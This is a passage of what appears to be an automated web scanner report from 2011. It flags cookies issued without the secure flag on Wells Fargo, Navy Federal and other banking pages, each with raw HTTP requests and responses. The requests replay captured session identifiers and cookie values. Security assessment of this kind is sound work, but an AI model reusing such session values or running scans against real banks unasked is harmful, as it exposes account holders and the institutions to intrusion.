set-cookie: SMIDENTITY=KDC8DK5B+KFv3Wz0S4K2LXSI4NgojmEdX2lulfZHWNW5jh+8BzJJh8KHjWLs1JqTo+0StslhsZtq4lyyEMIl0GAzy4I5jHURcU1INosJRPZPUqnycZXXkgvlWX/bMnXF1SioazWzlZBumjo782mfcGOSGzZ6T2j52k8DJwFasAcEq6ZcsHEQxgNk+ah8BOdvTcviU2WAGv0G+CeQus7N0onu+TGDhQ0W39ik0Cg9UB3KRVXs2KbKjqellsaunYWAIq1kwbkhHpHXGKLQUsg3glJkNpgNxmSQiWiC4o+mK7ggegysuL3PcK5zTI1Iw9XexI9N8wLqYLNQUz/0jdrKZmkQ0Ip2Zm1FhMKWvXjkVhktzIcKIr/IcMNQa8XEdZ7JERXHmTOamI52E0ET2IBtTGVVEeUOdGrvQiyegTguDsbQD4MSTWmYQ7ZXGSyXgruiBshchcGbOLHIKS6SvFT7pgjTnLK9JScdNdpYCvCG9cjkUtFjpNOSVxi1bKz5Xu8TO49YSSs9iFmlCix8Q1nG2I+rzTBtxIyWVW1GT9AoeRDYu5HzhJKISmwaX2qvWrTBe014K56+FA4eWCo9BOF9XQlpxTB1WpVbsoxwa3Rg7LNsq9S1GpNb8XRTJtfcmDvw; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx
Set-Cookie: pxs=671d45371feb47b7b0d445f52cd92025; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

6.108. https://www.myschedule.navyfederal.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myschedule.navyfederal.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.myschedule.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 15100
Content-Type: text/html
Content-Location: http://www.myschedule.navyfederal.org/Default.htm
Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT
Accept-Ranges: bytes
ETag: "014cf449e67c11:5e8"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close
Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/

<HTML>
<HEAD><meta scheme='a1afcc517bec909bf5c3fddea7c83c3d' name='TS26bd7b' content='fcdfb7ae7487b17f' /><!--9cc5da25f89a21d1fbb5ffa18da0bb73--><script type="text/javascript">if(window.addEventListe
...[SNIP]...

6.109. https://www.mystreetscape.com/my/charteroneinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/charteroneinvest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close


<html>

<head>


<title>
Charter One Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/charteroneinvest/jsp/
...[SNIP]...

6.110. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

6.111. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:58 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=A063DC75E80493714CD441148D97EDA0;Path=/;Secure
Set-cookie: wfacookie=B-201102021400581302177828;Domain=.wellsfargo.com;Expires=Sat, 30-Jan-2021 22:00:58 GMT;Path=/
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Set-cookie: WFHOME=PER;Domain=.wellsfargo.com;Expires=Sat, 01-Feb-2014 22:00:58 GMT;Path=/
Content-Length: 19011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

6.112. https://www.wellsfargo.com/Clickthrough&RequestType=Click&COID=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /Clickthrough&RequestType=Click&COID=

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Clickthrough&RequestType=Click&COID= HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 404 Not found
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:03 GMT
Content-length: 3018
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

6.113. https://www.wellsfargo.com/about/diversity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/diversity/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>About Wells Fargo - Diversity
...[SNIP]...

6.114. https://www.wellsfargo.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Auto Loans ... Wells F
...[SNIP]...

6.115. https://www.wellsfargo.com/autoloans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/apply

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autoloans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 301 Moved Permanently
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:49 GMT
Content-length: 15
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010
Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


                                   

6.116. https://www.wellsfargo.com/browser/jaws_setting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /browser/jaws_setting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.117. https://www.wellsfargo.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

6.118. https://www.wellsfargo.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /checking/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Checking Account - Compa
...[SNIP]...

6.119. https://www.wellsfargo.com/com/comintro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/comintro

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /com/comintro HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:25 GMT
Location: https://www.wellsfargo.com/com/
Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/com/">h
...[SNIP]...

6.120. https://www.wellsfargo.com/credit_cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Credit Cards
...[SNIP]...

6.121. https://www.wellsfargo.com/credit_cards/select_card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/select_card

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit_cards/select_card HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Location: https://www.wellsfargo.com/credit_cards/
Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/credit_
...[SNIP]...

6.122. https://www.wellsfargo.com/equity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2TyTNJhY3JchnGmJ4bFhFZNhrNjKnLLw809GTQGsf17zgJWCnCyt!-530822505; domain=.wellsfargo.com; path=/; secure
Set-Cookie: msc=5572; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:44 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=2129943306.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Home Equity Loans & Li
...[SNIP]...

6.123. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/rate_payments/information/rate_calc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /equity/rate_payments/information/rate_calc HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Location: https://www.wellsfargo.com/equity/tools/rate_calc
Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/equity/
...[SNIP]...

6.124. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

6.125. https://www.wellsfargo.com/help/faqs/signon_faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:22 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head><title>Wells Fargo Username/Password Hel
...[SNIP]...

6.126. https://www.wellsfargo.com/help/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/services

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/services HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:23 GMT
Content-length: 11416
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


